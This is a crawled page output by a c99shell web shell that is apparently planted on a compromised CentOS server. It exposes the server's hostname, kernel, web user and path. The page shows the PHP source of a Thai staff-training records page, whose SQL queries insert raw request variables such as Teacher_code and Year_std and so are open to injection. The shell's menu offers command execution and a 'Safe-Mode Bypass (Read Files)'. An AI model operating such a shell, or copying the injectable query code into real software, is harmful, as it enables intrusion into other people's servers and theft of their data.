Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/Develop_person_depart/ drwxr-xr-x |
Viewing file: Training.php (8.57 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php session_start(); if (session_is_registered("valid_user")&&session_is_registered("Priority") ) { $Username = $valid_user; $Password = $password; include("../include/FunctionDB.php"); include("admin_menu.php"); ConnectDB(); $strSQL = "SELECT * FROM training_tb WHERE Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result = mysql_query($strSQL); $num = mysql_num_rows($result ); $rs = mysql_fetch_array($result); $sql = "SELECT * FROM personal_tb WHERE Teacher_code='$Teacher_code'"; $res = mysql_query($sql); $rss = mysql_fetch_array($res); //$Teacher_code = $rs["Teacher_code"]; ?> <meta http-equiv="Content-Type" content="text/html; charset=TIS-620"> <style type="text/css"> <!-- .style6 {font-size: 14px} --> </style> <table width="816" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="816"><br> <fieldset> <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_personal.php" >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle">ข้อมูลงานประวัติการดำรงตำแหน่ง</font></legend> <label><div align="center"> <form id="form1" name="form1" method="post" action=""> <table width="65%" border="0" align="center" cellpadding="0" cellspacing="2" style="border:1px solid gray"> <tr bgcolor="#D2F49F" > <td height="25" colspan="2" background="../Image/bdevel.jpg"><div align="center"><font color="#000000" size="4" face="Tahoma"><strong>ประวัติการพัฒนาบุคลากร ปี </strong></font><strong><font color="#996600" size="2" face="Tahoma"><a href="Training.php?Teacher_code=<?= $row["Teacher_code"] ?>&Year_std=<?=$row["Year_std"]?>" title="Click to see Detail" class="d"><? echo $rs["Year_std"]?></a></font></strong></div></td> </tr> <tr bgcolor="#CCCCCC"> <td width="65%" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">ประเภท</font></div></td> <td width="35%" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">จำนวนรายการทั้งหมด / ปี</font></div></td> </tr> <tr bgcolor="#CCCCCC"> <td colspan="2" bgcolor="#EEEEEE" style="border:1px solid gray"><font color="#003366" size="2" face="Tahoma"><? echo $rss[First_name] ?> <font color="#003366" size="2" face="Tahoma"><? echo $rss[Teacher_name] ?></font> <? echo $rss[Teacher_lastname] ?> </font></td> </tr> <tr> <td bgcolor="#F9FEED"><span class="style6"><font color="#003366" face="Tahoma"><img src="../Image/Turtle_bullet.gif" width="10" height="10" /><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"> การอบรม</a></font></span></td> <td bgcolor="#F9FEED"><div align="center"><font color="#003366" face="Tahoma"><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"><strong><font color="#996600" size="2" face="Tahoma"> <?php //$Teacher_code = $rs[Teaccher_code] ; $Year_std = $rs[Year_std]; $sql1 = "Select * From training_tb Where Training_type='00001' and Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result1 = mysql_query($sql1); $countnum = mysql_num_rows($result1); echo $countnum; ?> </font></strong></a></font></div></td> </tr> <tr> <td bgcolor="#F9FEED"><span class="style6"><font color="#003366" face="Tahoma"><img src="../Image/Turtle_bullet.gif" width="10" height="10" /><a href="TrainingTypeList.php?Training_type=00002&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"> การศึกษาดูงาน</a></font></span></td> <td bgcolor="#F9FEED"><div align="center"><font color="#003366" face="Tahoma"><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"><strong><font color="#996600" size="2" face="Tahoma"> <?php //$Teacher_code = $rs[Teaccher_code] ; $Year_std = $rs[Year_std]; $sql1 = "Select * From training_tb Where Training_type='00002' and Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result1 = mysql_query($sql1); $countnum = mysql_num_rows($result1); echo $countnum; ?> </font></strong></a></font></div></td> </tr> <tr> <td bgcolor="#F9FEED"><span class="style6"><font color="#003366" face="Tahoma"><img src="../Image/Turtle_bullet.gif" width="10" height="10" /> <a href="TrainingTypeList.php?Training_type=00003&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d">ประชุม </a><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"></a></font></span></td> <td bgcolor="#F9FEED"><div align="center"><font color="#003366" face="Tahoma"><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"><strong><font color="#996600" size="2" face="Tahoma"> <?php //$Teacher_code = $rs[Teaccher_code] ; $Year_std = $rs[Year_std]; $sql1 = "Select * From training_tb Where Training_type='00003' and Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result1 = mysql_query($sql1); $countnum = mysql_num_rows($result1); echo $countnum; ?> </font></strong></a></font></div></td> </tr> <tr> <td bgcolor="#F9FEED"><span class="style6"><font color="#003366" face="Tahoma"><img src="../Image/Turtle_bullet.gif" width="10" height="10" /> <a href="TrainingTypeList.php?Training_type=00004&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d">สัมมนา</a></font></span></td> <td bgcolor="#F9FEED"><div align="center"><font color="#003366" face="Tahoma"><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"><strong><font color="#996600" size="2" face="Tahoma"> <?php //$Teacher_code = $rs[Teaccher_code] ; $Year_std = $rs[Year_std]; $sql1 = "Select * From training_tb Where Training_type='00004' and Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result1 = mysql_query($sql1); $countnum = mysql_num_rows($result1); echo $countnum; ?> </font></strong></a></font></div></td> </tr> <tr> <td bgcolor="#F9FEED"><span class="style6"><font color="#003366" face="Tahoma"><img src="../Image/Turtle_bullet.gif" width="10" height="10" /> <a href="TrainingTypeList.php?Training_type=00005&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d">การศึกษาต่อของอาจารย์</a></font></span></td> <td bgcolor="#F9FEED"><div align="center"><font color="#003366" face="Tahoma"><a href="TrainingTypeList.php?Training_type=00001&Teacher_code=<? echo $rs[Teacher_code]?>&Year_std=<? echo $rs[Year_std]?>" class="d"><strong><font color="#996600" size="2" face="Tahoma"> <?php //$Teacher_code = $rs[Teaccher_code] ; $Year_std = $rs[Year_std]; $sql1 = "Select * From training_tb Where Training_type='00005' and Teacher_code='$Teacher_code' and Year_std='$Year_std'"; $result1 = mysql_query($sql1); $countnum = mysql_num_rows($result1); echo $countnum; ?> </font></strong></a></font></div></td> </tr> <tr bgcolor="#D2F49F"> <td height="25" background="../Image/bdevel.jpg" > </td> <td background="../Image/bdevel.jpg" > </td> </tr> </table> </form> <br> </div> </label> </fieldset><br> <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br> </font></td> </tr> </table> <?php } else { echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n"; echo"Please Login "; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]-- |